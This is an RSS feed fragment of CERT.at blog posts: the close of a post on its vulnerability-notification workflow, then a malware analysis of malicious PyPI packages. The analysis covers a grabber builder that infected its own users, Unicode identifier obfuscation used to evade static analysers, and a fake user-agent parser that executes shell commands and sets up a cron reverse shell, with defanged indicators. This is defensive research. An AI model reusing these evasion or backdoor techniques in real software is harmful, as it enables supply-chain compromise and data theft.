&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;As you can imagine, handling every possible case would be impossible. Therefore, we focus on the most typical issues and automate much of our processes. Our approach heavily relies on automated data processing and sending notifications via email. To accomplish this, we subscribe to data feeds from partners like ShadowServer&lt;a href=&quot;#references&quot;&gt; [2]&lt;/a&gt;, a non-profit organization, and process them with an open-source solution called IntelMQ &lt;a href=&quot;#references&quot;&gt;[3]&lt;/a&gt;. We handle about 90 thousand events daily, resulting in approximately 3-4 thousand emails sent out each month.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px; text-align: justify;&quot;&gt;With few exceptions, we do not scan online accessible devices. Firstly, we lack the resources to scan the Internet for so many different cases independently. Moreover, scanning poses legal challenges; it's entirely illegal in some countries, while others permit it. We might eventually gain the explicit right, and in some cases, even the obligation to perform scans under the NIS2 law. However, it&amp;rsquo;s still just a draft &lt;a href=&quot;#references&quot;&gt;[4]&lt;/a&gt;, and we are waiting for the final version.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px; text-align: justify;&quot;&gt;Our partners who conduct scans ensure they do so legally and non-intrusively, typically operating their servers in countries where scanning isn&amp;rsquo;t prohibited. This is the approach chosen by ShadowServer &lt;a href=&quot;#references&quot;&gt;[5]&lt;/a&gt;, our main data source.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Our Role&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;If we don&amp;rsquo;t scan, what exactly is our role? Simply put: we inform YOU. The details, however, are more complex. Simplifying, we manage two types of data feeds: regular, fully automated feeds, and urgent feeds received e.g. during ongoing incidents from researchers who have identified vulnerable or infected devices.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The automated feeds are immediately processed by our IntelMQ system. Urgent data feeds first go through &lt;span style=&quot;text-decoration: line-through;&quot;&gt;ChatGPT&lt;/span&gt;&amp;nbsp;a human element &amp;mdash; our Coordination Team (the friendly people who respond to your emails and monitor current threats, as seen in our daily news selections &lt;a href=&quot;#references&quot;&gt;[6]&lt;/a&gt;) and, if necessary, our Analysis Team (other nice people who specialize in deciphering what is really happening). They assess the information's source and relevance to ensure it pertains to significant incidents and that we keep you informed about what truly matters without spamming you.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Later, everything proceeds through IntelMQ, where our workflows are largely similar for both types of cases. We standardize the format, de-duplicate (to avoid sending you multiple notifications about the same issue from different sources), and seek contact data for the operators of the affected devices and services to make our notifications as valuable as possible. Each morning, we send these notifications via email to network operators. In urgent cases, the Coordination Team may decide to send notifications at any time.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Then, the ball is in your court: you need to decide what to do with the information. This usually involves patching affected software or restricting access to services, though sometimes you may decide the current configuration is necessary and choose to keep a database open, for example. You can always write back to us for clarifications or to request exclusion from future notifications. If no action is taken, we will notify you again, typically every 30 days, depending on the issue's criticality.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px; text-align: justify;&quot;&gt;We strive to maintain a low level of false positives &amp;mdash; no one wants to deal with them. However, we send notifications in dozens of cases &lt;a href=&quot;#references&quot;&gt;[7]&lt;/a&gt;, and you might occasionally leave access to a service open intentionally, perhaps because it contains public data or for other reasons. While this may be acceptable, we urge you to consider such decisions carefully, especially when you receive a notification from us. In many cases, services left intentionally open can be exploited for (D)DoS amplification attacks &amp;mdash; a situation where a threat actor tricks your system into sending a large amount of data to the targeted victim, as seen in well-known attacks leveraging Memcache &lt;a href=&quot;#references&quot;&gt;[8]&lt;/a&gt;. When operating services accessible online, please consider not only your own needs but also take steps to minimize the risk of your systems being used to harm others.&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;a title=&quot;Show full picture&quot; href=&quot;https://www.cert.at/media/files/news/blog/20240610/feeds-process.png&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240610/feeds-process.png&quot; alt=&quot;How the data are processed at CERT.at&quot; width=&quot;766&quot; height=&quot;250&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;How the data are processed at CERT.at&lt;/em&gt;&lt;/div&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Do We Know You?&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Probably not &amp;mdash; and that's a challenge. The effectiveness of our notifications largely depends on whether they reach the right person. Finding accurate contact data is not straightforward, and this is an area where we invest significant effort to improve.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Our security issue notifications typically target specific servers identified by their IP addresses. The first place we look for contact information is the RIPE Database &lt;a href=&quot;#references&quot;&gt;[9]&lt;/a&gt;. For example, if we receive an event related to an IP in a network operated by nic.at, our parent company, we can directly access the RIPE Database for relevant abuse contacts &lt;a href=&quot;#references&quot;&gt;[10]&lt;/a&gt;. This method works best for organizations that manage their own IP ranges and maintain current, monitored abuse contacts.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;However, it's often not so simple. Many times, we only receive a generic abuse email from an Internet Service Provider or hosting platform. While we send the notification, ensuring it reaches the operators responsible for the actual services depends on each company's internal procedures. We appreciate those who take this responsibility seriously (thank you!), but others struggle with properly forwarding notifications to the relevant caretakers.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px; text-align: justify;&quot;&gt;While we cannot influence how ISPs handle our notifications, their clients can take steps to ensure notifications are passed along. Perhaps you might consider asking your providers how they manage such notifications?&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;To address these issues, we maintain internal contacts with a list of operators. Currently, this system does not scale well as we mostly have information for organizations we directly work with, and updating contacts is mostly manual.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Our attempt to solve this problem is building a professional Constituency Portal &lt;a href=&quot;#references&quot;&gt;[11]&lt;/a&gt;. We have already migrated a significant portion of our contact data there and are working on further integrations with our internal systems. Soon, users of the Portal will be able to provide abuse contacts and manage the types of notifications they wish to receive from us. Access to the portal is currently very limited, but we hope to onboard more organizations this year.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Staying Up-to-Date&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Another challenge we face is deciding which data we process automatically and keeping an eye on existing sources. This is crucial for providing trustworthy and accurate information.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Over the past year, we developed a process that includes regular meetings of representatives from all involved teams. Every two weeks, we discuss all recent and incoming changes in our notification system. New data feeds, which we learn about from our current sources, private connections, meetings at different events, or public announcements, are briefly discussed. If needed, the Analysis Team has a closer look. The Coordination Team shares feedback experiences and prepares necessary communications. Finally, the Data &amp;amp; Development Team is responsible for integrating the data feed and ensuring that the system operates smoothly daily.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This new process and a one-time review of existing sources resulted in a significant increase in the types of issues we process. For our main provider, ShadowServer, we doubled the number of processed feeds in the last year, currently supporting about 70 of their feeds. For most data, we also have prepared short descriptions available on our website &lt;a href=&quot;#references&quot;&gt;[12]&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;It's Just the Beginning&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I've briefly described how we attempt to proactively inform network operators about potential issues. While we do our best to constantly expand our coverage and improve notification delivery, it's crucial to emphasize: we do not replace your responsibility for your services. We are here to help, but ultimately, you are responsible for your services. We do not see everything, we do not check everything, and most importantly, even if we try to be as quick as possible, if we have notified you, threat actors may have already noticed your service. Be proactive, responsible, and take timely precautions.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This post is just a small sample from our daily tasks, based on what I&amp;rsquo;m personally involved in. We provide many more services, including issuing public warnings, monitoring news sources, responding to incidents, sharing IoCs, and collecting NIS incident notifications. Every day, we do our best to cover your back.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;&lt;a id=&quot;references&quot;&gt;&lt;/a&gt;References&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[1] &lt;a href=&quot;https://www.shodan.io/search?query=country%3AAT&quot;&gt;https://www.shodan.io/search?query=country%3AAT&lt;/a&gt; [2024-05-15]&lt;br /&gt;[2] &lt;a href=&quot;https://www.shadowserver.org/&quot;&gt;https://www.shadowserver.org&lt;/a&gt; &lt;br /&gt;[3] &lt;a href=&quot;https://github.com/certtools/intelmq&quot;&gt;https://github.com/certtools/intelmq&lt;/a&gt;&lt;br /&gt;[4] &lt;a href=&quot;https://www.ris.bka.gv.at/Dokument.wxe?Abfrage=Begut&amp;amp;Dokumentnummer=BEGUT_42FD65C8_76B7_40F0_97E3_BB29BDFC0CE9&quot;&gt;https://www.ris.bka.gv.at/Dokument.wxe?Abfrage=Begut&amp;amp;Dokumentnummer=BEGUT_42FD65C8_76B7_40F0_97E3_BB29BDFC0CE9&lt;/a&gt;&lt;br /&gt;[5] &lt;a href=&quot;https://www.shadowserver.org/faq/is-scanning-legal/&quot;&gt;https://www.shadowserver.org/faq/is-scanning-legal/&lt;/a&gt;&lt;br /&gt;[6] &lt;a href=&quot;https://www.cert.at/de/meldungen/tagesberichte/&quot;&gt;https://www.cert.at/de/meldungen/tagesberichte/&lt;/a&gt;&amp;nbsp; (partially in German only)&lt;br /&gt;[7] &lt;a href=&quot;https://www.cert.at/de/services/daten-feeds/vulnerable/&quot;&gt;https://www.cert.at/de/services/daten-feeds/vulnerable/&lt;/a&gt; &lt;br /&gt;[8] &lt;a href=&quot;https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/&quot;&gt;https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/&lt;/a&gt; &lt;br /&gt;[9] &lt;a href=&quot;https://apps.db.ripe.net/db-web-ui/query&quot;&gt;https://apps.db.ripe.net/db-web-ui/query&lt;/a&gt; &lt;br /&gt;[10] &lt;a href=&quot;https://apps.db.ripe.net/docs/Types-of-Queries/Abuse-Contacts/&quot;&gt;https://apps.db.ripe.net/docs/Types-of-Queries/Abuse-Contacts/&lt;/a&gt; &lt;br /&gt;[11] &lt;a href=&quot;https://tuency.cert.at/docs/&quot;&gt;https://tuency.cert.at/docs/&lt;/a&gt; &lt;br /&gt;[12] &lt;a href=&quot;https://www.cert.at/de/services/daten-feeds/vulnerable/&quot;&gt;https://www.cert.at/de/services/daten-feeds/vulnerable/ &lt;/a&gt;&lt;/p&gt;</description><pubDate>Mon, 10 Jun 2024 08:37:37 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2024/6/how-we-cover-your-back</guid><dc:creator>CERT.at</dc:creator><dc:date>2024-06-10T08:37:37Z</dc:date></item><item><title>Double Agents and User Agents: Navigating the Realm of Malicious Python Packages</title><link>https://www.cert.at/en/blog/2024/4/double-agents-and-user-agents-navigating-the-realm-of-malicious-python-packages</link><description>&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Have you ever encountered the term 'double agent'? Recently, we've had the opportunity to revisit this concept in Austria. Setting aside real-world affairs for prosecutors and journalists, let&amp;rsquo;s explore what this term means in the digital world as I continue &lt;a href=&quot;https://cert.at/en/blog/2024/3/hobby-hunter-notes-pypi-under-attack&quot;&gt;my journey&lt;/a&gt; tracking malicious Python packages.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Open Source is a key!&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Suppose you were a &lt;span style=&quot;text-decoration: line-through;&quot;&gt;script kiddie&lt;/span&gt;&amp;nbsp;&lt;span style=&quot;text-decoration: line-through;&quot;&gt;threat actor&lt;/span&gt;&amp;nbsp;&lt;em&gt;researcher&lt;/em&gt; looking to &lt;span style=&quot;text-decoration: line-through;&quot;&gt;snag some cookies&lt;/span&gt; &lt;em&gt;analyse new tools used to steal information from victims&lt;/em&gt; &amp;mdash; where would you head? You might choose from several options, but let&amp;rsquo;s assume you love open source and decide to visit GitHub, one of the largest platforms for open source projects. It&amp;rsquo;s an excellent resource for almost everything IT-related, including educational materials on malware builders.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px; text-align: justify;&quot;&gt;I tricked you a bit there &amp;mdash; did you catch it? Not everything on GitHub is open source, even if the source code is visible. Moreover, &amp;ldquo;open source&amp;rdquo; doesn't mean the same thing in every context. It&amp;rsquo;s crucial to always check the licence.&amp;nbsp;Always check the licence.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;For instance, on GitHub, you can find the Oak Token Grabber V2. It offers a builder to customize a grabber (information stealer malware). Check out these features:&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240422/oak_capabilities.png&quot; alt=&quot;A screenshot of the README from the repository dreamyoak/Oak-Grabber-V2&quot; width=&quot;415&quot; height=&quot;400&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;A screenshot of the README from the repository &lt;/em&gt;dreamyoak/Oak-Grabber-V2&lt;/div&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This repository isn&amp;rsquo;t new; it existed already in the middle of last year &lt;a href=&quot;#references&quot;&gt;[1]&lt;/a&gt;. When I visited, there was a link to a website offering paid versions of educational RAT grabbers and other services. This isn't unusual. Reviewing the repository's history showed no activity for a year between March 2023 and March 2024, then suddenly, an author with a slightly different name (&lt;em&gt;dreamyoak&lt;/em&gt; instead of the original &lt;em&gt;dynastyoak&lt;/em&gt;) began updating the code. This suggests that the repository had been moved or perhaps taken down in the past year.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px; text-align: justify;&quot;&gt;A brief note on analysing the history of git repositories: like anything, you cannot blindly trust the data provided by git. For instance, dates can be easily tampered with by the commit author. However, in this case, all changes were made through the GitHub web interface, which means such commits are automatically signed by GitHub, and we can verify them using their public key &lt;a href=&quot;#references&quot;&gt;[2]&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;What did the new author do? The most significant change was the introduction of a new dependency that did quite a bit: collecting Wi-Fi passwords, PowerShell history, installed applications, desktop screenshots, and more. Yet, there was one tiny detail.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;These weren't features of the builder.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This data was collected from people trying to build malware, effectively acting as a double agent spying on both sides.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;In short, a grabber builder was transformed into a grabber itself. The dependency &amp;mdash; a Python package uploaded to PyPI &amp;mdash; was imported by the builder when used, then it automatically downloaded an actual grabber that collected and exfiltrated data. This was, in fact, the grabber advertised on the website &amp;mdash; the Nagogy Grabber &amp;mdash; first observed at least a year ago &lt;a href=&quot;#references&quot;&gt;[3]&lt;/a&gt;. It can be easily detected with a YARA rule from Any.run &lt;a href=&quot;#references&quot;&gt;[4]&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;While the malicious dependency straightforwardly downloaded and ran the actual grabber, a very clever old technique was used to evade static analysers. Python is one of the languages that does not require source code to be written using pure ASCII characters. PEP 3131 introduced support for any characters that can be normalized and defined Python behaviour as follows: &amp;ldquo;All identifiers are converted into the normal form NFKC while parsing; comparison of identifiers is based on NFKC.&amp;rdquo; &lt;a href=&quot;#references&quot;&gt;[5]&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;What does this mean? Consider the example below. In the first two lines, I used simple 'u' and 'a' letters. But the characters in the third line aren&amp;rsquo;t them any more&amp;mdash;those are &amp;ldquo;Mathematical Sans-Serif Bold Italic Small U&amp;rdquo; &lt;a href=&quot;#references&quot;&gt;[6]&lt;/a&gt; and &amp;ldquo;Mathematical Sans-Serif Bold Small A.&amp;rdquo; &lt;a href=&quot;#references&quot;&gt;[7]&lt;/a&gt; Both are part of the Unicode specification, and as you can see, even though they don&amp;rsquo;t graphically match the variable identifiers from previous lines, Python was able to process the statement successfully. This was possible thanks to the normalization, which translated the characters to ASCII before evaluation.&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240422/python-unicode-example.png&quot; alt=&quot;An example of mixing ASCII and Unicode characters in identifiers that could confuse people but not Python&quot; width=&quot;132&quot; height=&quot;121&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;An example of mixing ASCII and Unicode characters in identifiers that could confuse people but not Python&lt;/em&gt;&lt;/div&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This feature isn't often used, but authors of malicious code learned years ago that many static analysers do not follow PEP 3131 and won&amp;rsquo;t recognize what the code in the picture below, sampled from the malicious package imported by the mentioned grabber builder, really does.&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240422/code%20fragment.png&quot; alt=&quot;This is an entirely valid Python code downloading and running a malicious executable&quot; width=&quot;843&quot; height=&quot;274&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;This is an entirely valid Python code downloading and running a malicious executable&lt;/em&gt;&lt;/div&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The author of the Oak-Grabber-V2 seemed quite determined to maintain the double agent feature. After removing malicious packages from PyPI, they were quickly introduced new ones and updated the repository. Observing the stars and forks statistics captured by archive.org, the repository doubled its popularity in just a few days between February 27 and March 7 &lt;a href=&quot;#references&quot;&gt;[8]&lt;/a&gt; &lt;a href=&quot;#references&quot;&gt;[9]&lt;/a&gt;. It appears the author promoted the tool aggressively and later tried to extract data from its users &amp;mdash; the 'double agent' feature was introduced on April 11. This cat-and-mouse game finished when GitHub removed the repository on April 16.&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240422/27th%20Feb%20Oak.png&quot; alt=&quot;Repository stats on February 27&quot; width=&quot;218&quot; height=&quot;250&quot; /&gt; &lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240422/Oak%207%20March.png&quot; alt=&quot;Repository stats on March 7&quot; width=&quot;258&quot; height=&quot;250&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;Comparison of the repository statistics on February 27 &lt;a href=&quot;#references&quot;&gt;[8]&lt;/a&gt; and March 7 &lt;a href=&quot;#references&quot;&gt;[9]&lt;/a&gt;&lt;br /&gt;&lt;/em&gt;&lt;/div&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: left;&quot;&gt;User agent control&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;It wasn&amp;rsquo;t just one 'agent' found recently. I came across another Python package that offered a unique functionality &amp;mdash; controlling your server via the User-Agent header!&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240422/ua_execution.png&quot; alt=&quot;A sample from the user-agents-parser package&quot; width=&quot;442&quot; height=&quot;98&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;A sample from the &lt;/em&gt;&lt;code&gt;user-agents-parser&lt;/code&gt;&lt;em&gt; package&lt;/em&gt;&lt;/div&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This innovative feature was embedded within a clone of a popular package designed to parse user-agent strings &lt;a href=&quot;#references&quot;&gt;[10]&lt;/a&gt;, which are self-descriptions browsers send to servers with every request &lt;a href=&quot;#references&quot;&gt;[11]&lt;/a&gt;. Web applications often use these strings for different purposes, like directing users to a mobile site or gathering statistics. In this instance, the author replicated an existing package but added a twist: the strings could execute as shell commands before being parsed. Despite the modification, the packages maintained their original functionality, meaning you wouldn't know you were using a compromised package unless a specific request triggered the command execution.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Moreover, the package creator employed another common tactic worth noting: they preserved the original project's website and author information, which are typically displayed on package index pages like PyPI. These stats can mislead users into trusting a seemingly popular and secure package.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;PyPI recently took steps to prevent such deception by clearly indicating which data are verified and which are not &amp;mdash; a significant improvement.&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240422/pypi_old.png&quot; alt=&quot;Stats in PyPI - old version&quot; width=&quot;182&quot; height=&quot;300&quot; /&gt; &lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240422/pypi_new.png&quot; alt=&quot;PyPI stats - new&quot; width=&quot;198&quot; height=&quot;300&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;Left &amp;ndash; a screen from a repository captured in archive.org &lt;a href=&quot;#references&quot;&gt;[12]&lt;/a&gt;, right &amp;ndash; another repository, state as of today &lt;a href=&quot;#references&quot;&gt;[10]&lt;/a&gt;.&lt;/em&gt;&lt;/div&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: left;&quot;&gt;After I reported the package, Mike Fiedler from PyPI security team found that its earlier version was also trying to establish a persistent reverse shell by registering a cron job.&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240422/ua_shell.png&quot; alt=&quot;&quot; width=&quot;667&quot; height=&quot;124&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;An earlier version of &lt;/em&gt;&lt;code&gt;user-agents-parser&lt;/code&gt;&lt;em&gt; was trying to use crontab for persistence&lt;/em&gt;&lt;/div&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: left;&quot;&gt;Final thoughts&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;All associated packages were removed from the PyPI, and the Oak-Grabber-V2 repository was shut down by GitHub. However, this isn't the first or last time we'll encounter such threats. If you're looking for advice, I've noted some tips in my &lt;a href=&quot;https://cert.at/en/blog/2024/3/hobby-hunter-notes-pypi-under-attack&quot;&gt;last post&lt;/a&gt;. But most importantly, avoid downloading random software, even if it's for educational purposes.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;IoCs&lt;/h3&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Malicious packages used by Oak-Grabber-V2: &lt;code&gt;argsreq&lt;/code&gt;, &lt;code&gt;colarg&lt;/code&gt;, &lt;code&gt;colargs&lt;/code&gt;, &lt;code&gt;reqarg&lt;/code&gt;, &lt;code&gt;reqargs &lt;/code&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;URLs with the actual grabber:&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;code&gt;hxxps://api.dreamyoak[.]xyz/cdn/file&lt;/code&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;code&gt;hxxps://api2.dreamyoak[.]xyz/cdn/file&lt;/code&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;Malicious packages pretending to be user agent parser: &lt;code&gt;user-agents-parser&lt;/code&gt;, &lt;code&gt;user-agents-parsers&lt;/code&gt;&lt;/li&gt;&#13;
&lt;li&gt;IP used in an attempt for reverse shell: &lt;code&gt;95.179[.]177[.]74&lt;/code&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;&lt;a id=&quot;references&quot;&gt;&lt;/a&gt;References&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[1] https:&amp;nbsp;//web.archive.org/web/20230731214919/https://github.com/dreamyoak/&lt;br /&gt;[2] &lt;a href=&quot;https://github.com/web-flow.gpg&quot;&gt;https://github.com/web-flow.gpg&lt;/a&gt;&lt;br /&gt;[3] &lt;a href=&quot;https://twitter.com/MalGamy12/status/1698367753919357255&quot;&gt;https://twitter.com/MalGamy12/status/1698367753919357255&lt;/a&gt;&lt;br /&gt;[4] &lt;a href=&quot;https://github.com/anyrun/YARA/blob/73fba11a040629e147281aa0528439d72fb5402a/NagogyGrabber.yar&quot;&gt;https://github.com/anyrun/YARA/blob/73fba11a040629e147281aa0528439d72fb5402a/NagogyGrabber.yar&lt;/a&gt;&lt;br /&gt;[5] &lt;a href=&quot;https://peps.python.org/pep-3131/&quot;&gt;https://peps.python.org/pep-3131/&lt;/a&gt;&lt;br /&gt;[6] &lt;a href=&quot;https://unicodeplus.com/U+1D66A&quot;&gt;https://unicodeplus.com/U+1D66A &lt;br /&gt;&lt;/a&gt;[7] &lt;a href=&quot;https://unicodeplus.com/U+1D5EE&quot;&gt;https://unicodeplus.com/U+1D5EE&lt;/a&gt;&lt;br /&gt;[8] https:&amp;nbsp;//web.archive.org/web/20240227221457/https://github.com/c/Oak-Grabber-V2?tab=readme-ov-file&lt;br /&gt;[9] https:&amp;nbsp;//web.archive.org/web/20240307140321/https://github.com/dreamyoak/Oak-Grabber-V2&lt;br /&gt;[10] The original, safe package is here: &lt;a href=&quot;https://pypi.org/project/user-agents/&quot;&gt;https://pypi.org/project/user-agents/&lt;/a&gt;&lt;br /&gt;[11] &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Glossary/User_agent&quot;&gt;https://developer.mozilla.org/en-US/docs/Glossary/User_agent&lt;/a&gt;&lt;br /&gt;[12] &lt;a href=&quot;https://web.archive.org/web/20240117161520/https://pypi.org/project/adafruit-circuitpython-htu31d/&quot;&gt;https://web.archive.org/web/20240117161520/https://pypi.org/project/adafruit-circuitpython-htu31d/&lt;/a&gt;&lt;/p&gt;</description><pubDate>Mon, 22 Apr 2024 15:12:10 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2024/4/double-agents-and-user-agents-navigating-the-realm-of-malicious-python-packages</guid><dc:creator>CERT.at</dc:creator><dc:date>2024-04-22T15:12:10Z</dc:date></item><item><title>On Cybersecurity Alert Levels</title><link>https://www.cert.at/en/blog/2024/4/on-cybersecurity-alert-levels</link><description>&lt;p&gt;Last week I was invited to provide input to a tabletop exercise for city-level crisis managers on cyber security risks and the role of CSIRTs. The organizers brought a color-coded threat-level sheet (based on the &lt;a href=&quot;https://www.cisecurity.org/cybersecurity-threats/alert-level&quot; target=&quot;_blank&quot; rel=&quot;noreferrer noopener&quot;&gt;CISA Alert Levels&lt;/a&gt;) to the discussion and asked whether we also do color-coded alerts in Austria and what I think of these systems.&lt;/p&gt;&#13;
&lt;p&gt;My answer was negative on both questions, and I think it might be useful if I explain my rationale here. The first was rather obvious and easy to explain, the second one needed a bit of thinking to be sure why my initial reaction to the document was so negative.&lt;/p&gt;&#13;
&lt;h2&gt;Escalation Ratchet&lt;/h2&gt;&#13;
&lt;p&gt;The first problem with color-coded threat levels is their tendency to be a one-way escalation ratchet: easy to escalate, but hard to de-escalate. I&amp;rsquo;ve been hit by that mechanism before during a real-world incident and that led me to be wary of that effect. Basically, the person who raises the alert takes very little risk: if something bad happens, they did the right thing, and if the danger doesn&amp;rsquo;t materialize, then &amp;ldquo;better safe than sorry&amp;rdquo; is proclaimed, and everyone is happy, nevertheless. In other words, raising the threat level is a safe decision.&lt;/p&gt;&#13;
&lt;p&gt;On the other hand, lowering the threat level is an inherently risky decision: If nothing bad happens afterwards, there might be some &amp;ldquo;thank you&amp;rdquo; notes, but if the threat materializes, then the blame falls squarely on the shoulders of the person who gave the signal that the danger was over. Thus, in a CYA-dominated environment like public service, it is not a good career move to greenlight a de-escalation.&lt;/p&gt;&#13;
&lt;p&gt;We&amp;rsquo;ve seen this process play out in the non-cyber world over the last years, examples include&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Terror threat level after 9/11&lt;/li&gt;&#13;
